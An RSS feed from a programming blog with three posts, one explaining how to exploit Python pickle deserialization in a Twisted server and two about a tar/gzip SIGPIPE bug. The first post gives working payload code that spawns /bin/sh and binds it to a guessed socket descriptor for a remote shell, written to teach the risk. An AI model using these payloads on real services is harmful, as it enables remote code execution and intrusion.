<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Made of Bugs &#187; python</title>
	<atom:link href="http://blog.nelhage.com/tag/python/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.nelhage.com</link>
	<description>It's software. It's made of bugs.</description>
	<lastBuildDate>Thu, 18 Aug 2011 21:57:23 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Exploiting misuse of Python&#8217;s &#8220;pickle&#8221;</title>
		<link>http://blog.nelhage.com/2011/03/exploiting-pickle/</link>
		<comments>http://blog.nelhage.com/2011/03/exploiting-pickle/#comments</comments>
		<pubDate>Sun, 20 Mar 2011 22:38:13 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[pickle]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[twisted]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=469</guid>
		<description><![CDATA[If you program in Python, you&#8217;re probably familiar with the pickle serialization library, which provides for efficient binary serialization and loading of Python datatypes. Hopefully, you&#8217;re also familiar with the warning printed prominently near the start of pickle&#8217;s documentation: Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. [...]]]></description>
			<content:encoded><![CDATA[<p>If you program in Python, you&#8217;re probably familiar with the
<a href="http://docs.python.org/library/pickle.html"><code>pickle</code></a> serialization library, which provides for efficient
binary serialization and loading of Python datatypes. <em>Hopefully</em>,
you&#8217;re also familiar with the warning printed prominently near the
start of <code>pickle</code>&#8217;s documentation:</p>

<blockquote>
  <p><em>Warning:</em> The pickle module is not intended to be secure against
  erroneous or maliciously constructed data. Never unpickle data
  received from an untrusted or unauthenticated source.</p>
</blockquote>

<p>Recently, however, I stumbled upon a project that was accepting and
unpickling untrusted pickles over the network, and a poll of some
friends revealed that few of them were aware of just how easy it is to
exploit a service that does this. As such, this blog post will
describe exactly how trivial it is to exploit such a service, using a
simplified version of the code I recently encountered as an
example. Nothing in here is novel, but it&#8217;s interesting if you haven&#8217;t
seen it.</p>

<h2>The Target</h2>

<p>The vulnerable code was a <a href="http://twistedmatrix.com/">Twisted</a> server that listened over
SSL. The code looked roughly like the following:</p>


<div class="wp_syntax"><div class="code"><pre class="python" style="font-family:monospace;"><span style="color: #ff7700;font-weight:bold;">class</span> VulnerableProtocol<span style="color: black;">&#40;</span>protocol.<span style="color: black;">Protocol</span><span style="color: black;">&#41;</span>:
  <span style="color: #ff7700;font-weight:bold;">def</span> dataReceived<span style="color: black;">&#40;</span><span style="color: #008000;">self</span>, data<span style="color: black;">&#41;</span>:
&nbsp;
     <span style="color: #808080; font-style: italic;"># Code to actually parse incoming data according to an</span>
     <span style="color: #808080; font-style: italic;">#  internal state machine</span>
     <span style="color: #808080; font-style: italic;"># If we just finished receiving headers, call verifyAuth() to</span>
     <span style="color: #808080; font-style: italic;">#  check authentication</span>
&nbsp;
  <span style="color: #ff7700;font-weight:bold;">def</span> verifyAuth<span style="color: black;">&#40;</span><span style="color: #008000;">self</span>, headers<span style="color: black;">&#41;</span>:
    <span style="color: #ff7700;font-weight:bold;">try</span>:
      <span style="color: #dc143c;">token</span> = <span style="color: #dc143c;">cPickle</span>.<span style="color: black;">loads</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">base64</span>.<span style="color: black;">b64decode</span><span style="color: black;">&#40;</span>headers<span style="color: black;">&#91;</span><span style="color: #483d8b;">'AuthToken'</span><span style="color: black;">&#93;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>
      <span style="color: #ff7700;font-weight:bold;">if</span> <span style="color: #ff7700;font-weight:bold;">not</span> check_hmac<span style="color: black;">&#40;</span><span style="color: #dc143c;">token</span><span style="color: black;">&#91;</span><span style="color: #483d8b;">'signature'</span><span style="color: black;">&#93;</span>, <span style="color: #dc143c;">token</span><span style="color: black;">&#91;</span><span style="color: #483d8b;">'data'</span><span style="color: black;">&#93;</span>, getSecretKey<span style="color: black;">&#40;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>:
        <span style="color: #ff7700;font-weight:bold;">raise</span> AuthenticationFailed
      <span style="color: #008000;">self</span>.<span style="color: black;">secure_data</span> = <span style="color: #dc143c;">token</span><span style="color: black;">&#91;</span><span style="color: #483d8b;">'data'</span><span style="color: black;">&#93;</span>
    <span style="color: #ff7700;font-weight:bold;">except</span>:
      <span style="color: #ff7700;font-weight:bold;">raise</span> AuthenticationFailed</pre></div></div>


<p>So, if we just send a request that looks something like:</p>

<pre><code>AuthToken: &lt;pickle here&gt;
</code></pre>

<p>The server will happily unpickle it.</p>

<h2>Executing Code</h2>

<p>So, what can we do with that? Well, <code>pickle</code> is supposed to allow us
to represent arbitrary objects. An obvious target is Python&#8217;s
<a href="http://docs.python.org/library/subprocess.html"><code>subprocess.Popen</code></a> objects &#8212; if we can trick the target
into instantiating one of those, they&#8217;ll be executing arbitrary
commands for us! To generate such a pickle, however, we can&#8217;t just
create a <code>Popen</code> object and pickle it; for various mostly-obvious
reasons, that won&#8217;t work. We could read up on the &#8220;pickle&#8221; format and
construct a stream by hand, but it turns out there is no need to.</p>

<p><code>pickle</code> allows arbitrary objects to declare how they should be
pickled by defining a <a href="http://docs.python.org/library/pickle.html#object.__reduce__"><code>__reduce__</code></a> method, which should
return either a string or a tuple describing how to reconstruct this
object on unpickling. In the simplest form, that tuple should just
contain</p>

<ul>
<li>A callable (which must be either a class, or satisfy some other,
odder, constraints), and</li>
<li>A tuple of arguments to call that callable on.</li>
</ul>

<p><code>pickle</code> will pickle each of these pieces separately, and then on
unpickling, will call the callable on the provided arguments to
construct the new object.</p>
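
<p>A harmless sketch of that mechanism, written for Python 3 (so it uses <code>pickle</code> rather than <code>cPickle</code>). The class name <code>Sneaky</code> and the choice of <code>sorted</code> as the callable are made up for illustration. It should show that unpickling hands back whatever the callable returns, not an instance of the class that was pickled.</p>

```python
import pickle


class Sneaky(object):
    # Hypothetical class, for illustration only.
    def __reduce__(self):
        # (callable, args): on unpickling, pickle calls sorted([3, 1, 2])
        return (sorted, ([3, 1, 2],))


payload = pickle.dumps(Sneaky())
result = pickle.loads(payload)

print(result)                      # [1, 2, 3]
print(isinstance(result, Sneaky))  # False
```

<p>Nothing in the pickle stream refers to <code>Sneaky</code> at all; the receiving side only needs to be able to import the callable.</p>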

<p>And so, we can construct a pickle that, when un-pickled, will execute
<code>/bin/sh</code>, as follows:</p>


<div class="wp_syntax"><div class="code"><pre class="python" style="font-family:monospace;"><span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">cPickle</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">subprocess</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">base64</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">class</span> RunBinSh<span style="color: black;">&#40;</span><span style="color: #008000;">object</span><span style="color: black;">&#41;</span>:
  <span style="color: #ff7700;font-weight:bold;">def</span> __reduce__<span style="color: black;">&#40;</span><span style="color: #008000;">self</span><span style="color: black;">&#41;</span>:
    <span style="color: #ff7700;font-weight:bold;">return</span> <span style="color: black;">&#40;</span><span style="color: #dc143c;">subprocess</span>.<span style="color: black;">Popen</span>, <span style="color: black;">&#40;</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'/bin/sh'</span>,<span style="color: black;">&#41;</span>,<span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">print</span> <span style="color: #dc143c;">base64</span>.<span style="color: black;">b64encode</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">cPickle</span>.<span style="color: black;">dumps</span><span style="color: black;">&#40;</span>RunBinSh<span style="color: black;">&#40;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span></pre></div></div>


<h2>Getting a Remote Shell</h2>

<p>At this point, we&#8217;ve basically won. We can run arbitrary shell
commands on the target, and there are any number of ways we could
bootstrap from here up to an interactive shell and whatever else we
might want.</p>

<p>For completeness, I&#8217;ll explain what I did, since it&#8217;s a moderately
cute trick. <code>subprocess.Popen</code> lets us select which file descriptors
to attach to stdin, stdout, and stderr for the new process by passing
integers for the <code>stdin</code> and similarly-named arguments, so we can open
our <code>/bin/sh</code> on arbitrarily-numbered fd&#8217;s.</p>
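
<p>To see the integer form of those arguments in isolation, here is a benign Python 3 sketch, assuming a POSIX system. It passes the write end of a pipe (a plain integer) as <code>stdout</code> and runs a child that only prints a line; the message text is arbitrary.</p>

```python
import os
import subprocess
import sys

# os.pipe() returns two plain integer file descriptors.
read_fd, write_fd = os.pipe()

child = subprocess.Popen(
    [sys.executable, "-c", "print('hello from child')"],
    stdout=write_fd,  # an integer fd, not a file object
)
os.close(write_fd)    # close the parent's copy so the reader can see EOF
child.wait()

output = os.read(read_fd, 1024)
os.close(read_fd)
print(output)
```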

<p>However, as mentioned above, the target server uses Twisted, and it
serves all requests in the same thread, using an asynchronous
event-driven model. This means we can&#8217;t necessarily predict which file
descriptor on the server will correspond to our socket, since it
depends on how many other clients are connected.</p>

<p>It also means, however, that every time we connect to the server,
we&#8217;ll open a new socket inside the same server process. So, let&#8217;s
guess that the server has fewer than, say, 20 concurrent connections
at the moment. If we connect to the server&#8217;s socket 20 times, that
will open 20 new file descriptors in the server. Since they&#8217;ll get
assigned sequentially, one of them will almost certainly be fd
20. Then, we can generate a pickle like so, and send it over:</p>


<div class="wp_syntax"><div class="code"><pre class="python" style="font-family:monospace;"><span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">cPickle</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">subprocess</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">base64</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">class</span> Exploit<span style="color: black;">&#40;</span><span style="color: #008000;">object</span><span style="color: black;">&#41;</span>:
  <span style="color: #ff7700;font-weight:bold;">def</span> __reduce__<span style="color: black;">&#40;</span><span style="color: #008000;">self</span><span style="color: black;">&#41;</span>:
    fd = <span style="color: #ff4500;">20</span>
    <span style="color: #ff7700;font-weight:bold;">return</span> <span style="color: black;">&#40;</span><span style="color: #dc143c;">subprocess</span>.<span style="color: black;">Popen</span>,
            <span style="color: black;">&#40;</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'/bin/sh'</span>,<span style="color: black;">&#41;</span>, <span style="color: #808080; font-style: italic;"># args</span>
             <span style="color: #ff4500;">0</span>,            <span style="color: #808080; font-style: italic;"># bufsize</span>
             <span style="color: #008000;">None</span>,         <span style="color: #808080; font-style: italic;"># executable</span>
             fd, fd, fd    <span style="color: #808080; font-style: italic;"># std{in,out,err}</span>
             <span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">print</span> <span style="color: #dc143c;">base64</span>.<span style="color: black;">b64encode</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">cPickle</span>.<span style="color: black;">dumps</span><span style="color: black;">&#40;</span>Exploit<span style="color: black;">&#40;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span></pre></div></div>


<p>We&#8217;ll open a <code>/bin/sh</code> on fd 20, which should be one of our 20
connections, and if all goes well, we&#8217;ll see a prompt printed to one
of those. We&#8217;ll send some junk on that fd until we manage to get the
original server to error out and close the connection, and we&#8217;ll be
left talking to <code>/bin/sh</code> over a socket. Game over.</p>
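
<p>The guess about descriptor numbers rests on the POSIX rule that a new descriptor gets the lowest number not currently in use. A small Python 3 sketch of that rule, assuming a single-threaded process and using <code>/dev/null</code> as a stand-in for the sockets a server would accept:</p>

```python
import os

# Open a few descriptors without closing any of them.
fds = [os.open(os.devnull, os.O_RDONLY) for _ in range(5)]
print(fds)  # increasing numbers, normally consecutive

# Free the lowest of ours and open again: that number is handed out again.
lowest = fds[0]
os.close(lowest)
reused = os.open(os.devnull, os.O_RDONLY)
print(reused == lowest)

for fd in fds[1:] + [reused]:
    os.close(fd)
```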

<h2>In Conclusion</h2>

<p>Again, nothing here should be novel, nor would I expect any of these
pieces to take a competent hacker more than a few minutes to figure out,
given the problem. But if this blog post teaches someone not to use
<code>pickle</code> on untrusted data, then it will be worth it.</p>
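
<p>One way a token check like the one above could avoid the problem, sketched in Python 3 under stated assumptions: verify the HMAC over the raw bytes <em>before</em> parsing anything, and use a data-only format such as JSON for the body. The names <code>make_token</code>, <code>verify_token</code> and <code>SECRET_KEY</code> are hypothetical, as is the layout (a 32-byte SHA-256 MAC followed by the body); this is not the fix the original project used.</p>

```python
import base64
import hashlib
import hmac
import json

SECRET_KEY = b"example-key"  # hypothetical; stands in for getSecretKey()
MAC_LEN = hashlib.sha256().digest_size  # 32 bytes


def make_token(data, key=SECRET_KEY):
    body = json.dumps(data, sort_keys=True).encode("utf-8")
    mac = hmac.new(key, body, hashlib.sha256).digest()
    return base64.b64encode(mac + body)


def verify_token(token, key=SECRET_KEY):
    raw = base64.b64decode(token)
    mac, body = raw[:MAC_LEN], raw[MAC_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    # Authenticate the bytes first; nothing is parsed until this passes.
    if not hmac.compare_digest(mac, expected):
        raise ValueError("authentication failed")
    return json.loads(body.decode("utf-8"))


token = make_token({"user": "alice"})
print(verify_token(token))
```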
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/03/exploiting-pickle/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Followup to &#8220;A Very Subtle Bug&#8221;</title>
		<link>http://blog.nelhage.com/2010/03/followup-to-a-very-subtle-bug/</link>
		<comments>http://blog.nelhage.com/2010/03/followup-to-a-very-subtle-bug/#comments</comments>
		<pubDate>Wed, 03 Mar 2010 17:45:11 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[followup]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[tar]]></category>
		<category><![CDATA[unix]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=160</guid>
		<description><![CDATA[After my previous post got posted to reddit, there was a bunch of interesting discussion there about some details I&#8217;d handwaved over. This is a quick followup on some of the investigation that various people carried out, and the conclusions they reached. In the reddit thread, lacos/lbzip2 objected that in his experiments, he didn&#8217;t see tar [...]]]></description>
			<content:encoded><![CDATA[<p>After my <a href="http://blog.nelhage.com/archives/150">previous post</a> got posted to <a href="http://www.reddit.com/r/programming/comments/b7djd/stuff_like_this_makes_me_hate_python_subtle_bugs/">reddit</a>, there was a bunch of
interesting discussion there about some details I&#8217;d handwaved
over. This is a quick followup on some of the investigation that various
people carried out, and the conclusions they reached.</p>

<p>In the reddit thread, <a href="http://lacos.hu/">lacos/lbzip2</a> <a href="http://www.reddit.com/r/programming/comments/b7djd/stuff_like_this_makes_me_hate_python_subtle_bugs/c0lc0dy">objected</a> that in his
experiments, he didn&#8217;t see <code>tar</code> closing the input pipe before it was
done reading the file, and so questioned where the <code>SIGPIPE</code>/<code>EPIPE</code>
was coming from in the first place. I had actually done similar
experiments with similar results, but I was still seeing the <code>EPIPE</code>,
so I knew it could happen, but I couldn&#8217;t totally explain why.</p>

<p>A friend of mine, David Benjamin, was curious enough to source-dive
<code>tar</code>, and <a href="http://davidben.scripts.mit.edu/blog/2010/02/28/tar-filled-pipes/">posted his results</a> on his own blog. He discovered that
by default, <code>tar</code> does not close the pipe after finding all the files
it needs, because the <code>tar</code> archive format allows for later copies of
the same file, which would supersede the previous ones. This explains
why <code>lacos</code> and I saw <code>tar</code> reading to the end of a <code>linux-2.6</code>
tarball, even if we only asked for the first file.</p>

<p>He also discovered, however, that a typical tar file ends with a
number of <code>NUL</code> blocks, which <code>tar</code> treats as end-of-file. And so
<code>tar</code> will close the pipe after reading the first of these, which
opens a narrow race condition whereby tar can potentially do so before
<code>gzip</code> has written the remaining <code>NUL</code> blocks, resulting in a
<code>SIGPIPE</code>.</p>
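
<p>The trailing <code>NUL</code> blocks are easy to see for yourself. This Python 3 sketch builds a tiny archive in memory with the standard <code>tarfile</code> module (not GNU <code>tar</code>, so the amount of padding may differ) and counts the all-zero 512-byte blocks at the end. The member name <code>hello.txt</code> is made up.</p>

```python
import io
import tarfile

buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tar:
    payload = b"hello\n"
    info = tarfile.TarInfo(name="hello.txt")  # hypothetical member name
    info.size = len(payload)
    tar.addfile(info, io.BytesIO(payload))

data = buf.getvalue()
blocks = [data[i:i + 512] for i in range(0, len(data), 512)]

# Count how many all-NUL blocks sit at the end of the archive.
nul_blocks = 0
for blk in reversed(blocks):
    if blk.strip(b"\0"):
        break
    nul_blocks += 1

print(len(blocks), nul_blocks)
```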

<p>Finally, the discussion inspired <code>lacos</code> to post a <a href="http://lists.gnu.org/archive/html/help-tar/2010-03/msg00000.html">query</a> to the <code>help-tar</code>
mailing list, asking for clarification of <code>tar</code>&#8217;s behavior with respect to <code>SIGPIPE</code> and closing the pipe early.
The brief thread that followed revealed, among other things, that the bug I posted about has been <a href="http://lists.gnu.org/archive/html/bug-tar/2009-06/msg00009.html">fixed</a> in
GNU tar as of last summer, by having <code>tar</code> reset the disposition of
<code>SIGPIPE</code> to <code>SIG_DFL</code> before spawning a child. It was also pointed out that tar checks whether a filter subprocess is killed by <code>SIGPIPE</code>, and treats that as a success &#8212; so it&#8217;s not actually necessary for a <code>tar</code> filter to handle <code>SIGPIPE</code> and exit cleanly, like <code>gzip</code> does.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/03/followup-to-a-very-subtle-bug/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>A Very Subtle Bug</title>
		<link>http://blog.nelhage.com/2010/02/a-very-subtle-bug/</link>
		<comments>http://blog.nelhage.com/2010/02/a-very-subtle-bug/#comments</comments>
		<pubDate>Sun, 28 Feb 2010 03:48:47 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[gzip]]></category>
		<category><![CDATA[pipes]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[signals]]></category>
		<category><![CDATA[tar]]></category>
		<category><![CDATA[unix]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=150</guid>
		<description><![CDATA[6.033, MIT&#8217;s class on computer systems, has as one of its catchphrases, &#8220;Complex systems fail for complex reasons&#8221;. As a class about designing and building complex systems, it&#8217;s a reminder that failure modes are subtle and often involve strange interactions between multiple parts of a system. In my own experience, I&#8217;ve concluded that they&#8217;re often [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://web.mit.edu/6.033/www/">6.033</a>, MIT&#8217;s class on computer systems, has as one of its
catchphrases, &#8220;Complex systems fail for complex reasons&#8221;. As a class
about designing and building complex systems, it&#8217;s a reminder that
failure modes are subtle and often involve strange interactions
between multiple parts of a system. In my own experience, I&#8217;ve
concluded that they&#8217;re often wrong. I like to say that complex systems
don&#8217;t usually fail for complex reasons, but for the <a href="http://ebroder.net/2010/01/25/complex-systems-and-simple-failures/">simplest, dumbest
possible reasons</a> &#8212; there are just more available dumb reasons. But sometimes,
complex systems do fail for complex reasons, and tracking them down
does require understanding across many of the different layers of
abstraction we&#8217;ve built up. This is a story of such a bug.</p>

<p>The following code snippet in Python is intended to extract and return
a single file from a tarball. It probably should be using
<a href="http://docs.python.org/library/tarfile.html"><code>tarfile</code></a>, but let&#8217;s ignore that for the moment.</p>

<pre><code>import subprocess
def extractFile(tarball, path):
  p = subprocess.Popen(['tar', '-xzOf', tarball, path],
                       stdout=subprocess.PIPE,
                       stderr=subprocess.PIPE)
  contents, err = p.communicate()
  if p.returncode:
    raise SomethingWentWrong(err)
  return contents
</code></pre>

<p>This code has a bug. It will often work just fine, but occasionally it
will fail, with &#8216;err&#8217; containing a message including <code>gzip: stdout:
Broken pipe</code>. If, however, you were to write the equivalent code in a
shell script:</p>

<pre><code> contents="$(tar -xzOf "$tarball" "$path")"
</code></pre>

<p>you would find that it never fails in this way. So what&#8217;s going on?</p>

<p>When we launch <code>tar</code> with the <code>-z</code> option, it creates a <code>pipe(7)</code> and
forks off a <code>gzip</code> process writing into one end of the pipe. It then
reads the uncompressed tarball from the other end of the pipe, parsing
our <code>tar</code> headers, until eventually it&#8217;s done, and it closes the read
end of the pipe.</p>

<p>Since we&#8217;ve given <code>tar</code> a specific path to extract, it doesn&#8217;t need to
read the entire tarball &#8212; only up until it can find that file. So it
may close the pipe before reading the entire file, and,
correspondingly, before <code>gzip</code> is done writing to it. As explained in
<code>pipe(7)</code>:</p>

<blockquote>
If all file descriptors referring to the read end of a pipe have been
closed, then a write(2) will cause a SIGPIPE signal to be generated
for the calling process.  If the calling process is ignoring this
signal, then write(2) fails with the error EPIPE.
</blockquote>

<p>Under normal circumstances, <code>gzip</code> expects that whoever is downstream
of it may only care about a prefix of the uncompressed stream, and so
it registers a <code>SIGPIPE</code> handler which exits cleanly.</p>

<p>Python, however, doesn&#8217;t want to get <code>SIGPIPE</code>s. Instead, Python would
rather just check the return value of every <code>write</code> call it makes, and
raise an <code>IOError</code> if necessary, so that Python code gets the error in
an appropriately Pythonic way, instead of through an asynchronous
signal. And so, at startup, Python uses <code>signal(2)</code> or <code>sigaction(2)</code>
to ignore <code>SIGPIPE</code> by setting it to <code>SIG_IGN</code>.</p>
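
<p>A short Python 3 sketch of what that looks like from inside the interpreter, assuming a POSIX system and a Python started in the usual way: writing to a pipe whose read end is closed raises an exception carrying <code>EPIPE</code> instead of killing the process.</p>

```python
import errno
import os
import signal

# With default startup settings this reports SIG_IGN for SIGPIPE.
print(signal.getsignal(signal.SIGPIPE))

read_fd, write_fd = os.pipe()
os.close(read_fd)  # no readers left on the pipe

caught = None
try:
    os.write(write_fd, b"x")
except OSError as exc:
    # SIGPIPE is ignored, so write(2) fails with EPIPE instead.
    caught = exc.errno
finally:
    os.close(write_fd)

print(caught == errno.EPIPE)
```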

<p>As explained in <code>sigaction(2)</code>:</p>

<blockquote>
A child created via fork(2) inherits a copy of its parent&#8217;s signal dispositions. During an execve(2), the dispositions of handled signals are reset to the default; the dispositions of ignored signals are left unchanged.
</blockquote>

<p>And so, when started from Python, <code>gzip</code> starts up with
<code>SIGPIPE</code> ignored. And, for reasons I don&#8217;t understand, rather than
unconditionally handling <code>SIGPIPE</code>, <code>gzip</code> first checks whether or
not it&#8217;s ignored, and only installs a handler if the signal is not
being ignored.</p>

<p>And so, <code>SIGPIPE</code> continues to be ignored, which means that <code>gzip</code>&#8217;s
<code>write(2)</code> fails with <code>EPIPE</code>. <code>gzip</code> sees the failure, calls <code>perror</code>
to report it, and then exits with a nonzero status. tar&#8217;s <code>wait</code> then sees <code>gzip</code> exit uncleanly,
which causes tar itself to exit uncleanly, and the Python code above turns that
nonzero return code into an exception.</p>

<p>There&#8217;s an easy workaround, which is to re-enable SIGPIPE in the
<code>subprocess</code> child:</p>

<pre><code>  # Needs "import signal" alongside "import subprocess".
  p = subprocess.Popen(['tar', '-xzOf', tarball, path],
                       stdout=subprocess.PIPE,
                       stderr=subprocess.PIPE,
                       preexec_fn=lambda:
                        signal.signal(signal.SIGPIPE, signal.SIG_DFL))
</code></pre>
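
<p>On Linux, the effect of that workaround can be observed directly, because <code>/proc/self/status</code> lists a process&#8217;s ignored signals as a hex mask on its <code>SigIgn</code> line. The following Python 3 sketch is Linux-only and assumes <code>cat</code> is on the path; the helper name <code>child_ignores_sigpipe</code> is made up. Note that Python 3.2 and later add a <code>restore_signals</code> argument to <code>Popen</code>, which defaults to <code>True</code> and already resets <code>SIGPIPE</code> in the child, so the sketch passes <code>restore_signals=False</code> to reproduce the older behavior described here.</p>

```python
import signal
import subprocess


def child_ignores_sigpipe(**popen_kwargs):
    """Return True if a freshly exec'd child starts with SIGPIPE ignored."""
    out = subprocess.check_output(["cat", "/proc/self/status"], **popen_kwargs)
    for line in out.decode().splitlines():
        if line.startswith("SigIgn:"):
            mask = int(line.split()[1], 16)
            # Signal N is represented by bit N-1 of the mask.
            return bool(mask & (1 << (signal.SIGPIPE - 1)))
    raise RuntimeError("no SigIgn line found")


# Old behavior: the child inherits Python's SIG_IGN for SIGPIPE.
inherited = child_ignores_sigpipe(restore_signals=False)

# Same call with the workaround applied in the child before exec.
reset = child_ignores_sigpipe(
    restore_signals=False,
    preexec_fn=lambda: signal.signal(signal.SIGPIPE, signal.SIG_DFL),
)

print(inherited, reset)
```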

<p>But who would think of doing that, without first having seen this
horribly subtle chain of bugs, and having to track down what went
wrong?</p>

<p>(Here&#8217;s the <a href="http://bugs.python.org/issue1652">Python bug report</a>, and many thanks to cjwatson for
posting his discovery of this class of bug on his <a href="http://www.chiark.greenend.org.uk/ucgi/~cjwatson/blosxom/2009-07-02-python-sigpipe.html">blog</a>, which
greatly reduced the amount of time I would have had to spend tracking
this down)</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/02/a-very-subtle-bug/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
	</channel>
</rss>

